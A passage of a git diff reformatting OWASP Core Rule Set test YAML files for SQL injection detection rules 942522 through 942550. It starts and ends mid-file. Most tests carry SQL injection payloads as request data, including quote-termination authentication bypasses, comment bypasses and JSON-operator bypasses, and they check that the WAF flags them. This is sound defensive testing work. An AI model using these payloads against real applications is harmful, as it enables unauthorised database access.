0the%20'--'%20string%20as%20this%20denotes%20a%20comment.%20The%20structure%20of%20the%20SQL%20command%20is%20now%20select%20*%20from%20person%20where%20name%3D''%20or%201%3D1%3B%20and%20this%20will%20select%20all%20person%20rows%20rather%20than%20just%20those%20named%20'susan'%20whose%20age%20is%202.%20The%20attacker%20has%20managed%20to%20craft%20a%20data%20string%20which%20exits%20the%20data%20context%20and%20entered%20a%20command%20context.%0A%0AA%20more%20complex%20example%20is%20now%20presented.%0A%0AImagine%20a%20program%20creates%20a%20SQL%20statement%20using%20the%20following%20string%20assignment%20command%20%3A%0A%0Avar%20statement%20%3D%20%22SELECT%20*%20FROM%20users%20WHERE%20name%20%3D%20'%22%20%2B%20userName%20%2B%20%22'%22%3B%0A%0AThis%20SQL%20code%20is%20designed%20to%20pull%20up%20the%20records%20of%20the%20specified%20username%20from%20its%20table%20of%20users.%20However%2C%20if%20the%20%22userName%22%20variable%20is%20crafted%20in%20a%20specific%20way%20by%20a%20malicious%20user%2C%20the%20SQL%20statement%20may%20do%20more%20than%20the%20code%20author%20intended.%20For%20example%2C%20setting%20the%20%22userName%22%20variable%20as%3A%0A%0A'%20OR%20'1'%3D'1%0Aor%20using%20comments%20to%20even%20block%20the%20rest%20of%20the%20query%20(there%20are%20three%20types%20of%20SQL%20comments%5B14%5D).%20All%20three%20lines%20have%20a%20space%20at%20the%20end%3A%0A%0A'%20OR%20'1'%3D'1'%20--%0A'%20OR%20'1'%3D'1'%20%7B%0A'%20OR%20'1'%3D'1'%20%2F*%20" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942522] + - test_id: 9 desc: "Detect admin%40juice-sh.op'and%20likely%20(id)--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" - version: HTTP/1.0 - output: - log_contains: id "942522" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "admin%2540juice-sh.op%5C%27and%2520likely%2520%28id%29--" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml index eb9af87..0fc6887 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942530.yaml @@ -2,23 +2,22 @@ meta: author: "Franziska Bühler, azurit" description: "Detects SQL query termination" - enabled: true - name: 942530.yaml +rule_id: 942530 tests: - - test_title: 942530-1 + - test_id: 1 desc: "Detects SQL query termination with ';" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin@juice-sh.op';&password=foo" - version: HTTP/1.0 - output: - log_contains: id "942530" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin@juice-sh.op';&password=foo" + version: HTTP/1.0 + output: + log: + expect_ids: [942530] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml index 97d543f..ad78ed7 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml @@ -2,135 +2,134 @@ meta: author: "karelorigin, Walter Hop, azurit" description: Various Authentication bypass tests - enabled: true - name: 942540.yaml +rule_id: 942540 tests: - - test_title: 942540-1 + - test_id: 1 desc: "Positive test for single quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op';" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op';" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] + - test_id: 2 desc: "Positive test for double quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op\";" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op\";" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] + - test_id: 3 desc: "Positive test for backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op`;" - version: HTTP/1.0 - output: - log_contains: id "942540" - - test_title: 942540-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op`;" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] + - test_id: 4 desc: "False positive test CSV balanced single quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='foo';'bar';'def'" - version: HTTP/1.0 - output: - no_log_contains: id "942540" - - test_title: 942540-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='foo';'bar';'def'" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942540] + - test_id: 5 desc: "False positive test balanced backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=`foo`;`bar`;`def`" - version: HTTP/1.0 - output: - no_log_contains: id "942540" - - test_title: 942540-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=`foo`;`bar`;`def`" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942540] + - test_id: 6 desc: "False positive test (markdown) mixed and balanced quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Content-Type: "multipart/form-data; boundary=--------397236876" - method: POST - port: 80 - uri: "/post" - data: | - ----------397236876 - Content-Disposition: form-data; name="document"; filename="document.md" - Content-Type: text/markdown + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Type: "multipart/form-data; boundary=--------397236876" + method: POST + port: 80 + uri: "/post" + data: | + ----------397236876 + Content-Disposition: form-data; name="document"; filename="document.md" + Content-Type: text/markdown - # Foo - my name is 'foo'; and I work on CRS. - # Bar - my name is "bar"; and I work on CRS. - ----------397236876-- - version: "HTTP/1.1" - output: - no_log_contains: id "942540" - - test_title: 942540-7 + # Foo + my name is 'foo'; and I work on CRS. + # Bar + my name is "bar"; and I work on CRS. + ----------397236876-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [942540] + - test_id: 7 desc: "Test for bypass with comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" - version: HTTP/1.0 - output: - log_contains: id "942540" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" + version: HTTP/1.0 + output: + log: + expect_ids: [942540] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml index f063ea0..f6691e6 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml @@ -2,672 +2,671 @@ meta: author: "Andrea Menin (theMiddle), azurit" description: JSON in SQL bypass technique - enabled: true - name: 942550.yaml +rule_id: 942550 tests: - - test_title: 942550-1 + - test_id: 1 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 2 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 3 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 4 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 5 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 6 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 7 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 8 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 9 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 10 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 11 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 12 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 13 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 14 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 15 desc: | JSON in SQL (ARGS) decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 16 desc: | JSON in SQL (REQUEST_FILENAME) decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log: + expect_ids: [942550] + - test_id: 17 desc: | JSON in SQL (ARGS) decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" - version: HTTP/1.0 - output: - log_contains: id "942550" - - test_title: 942550-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 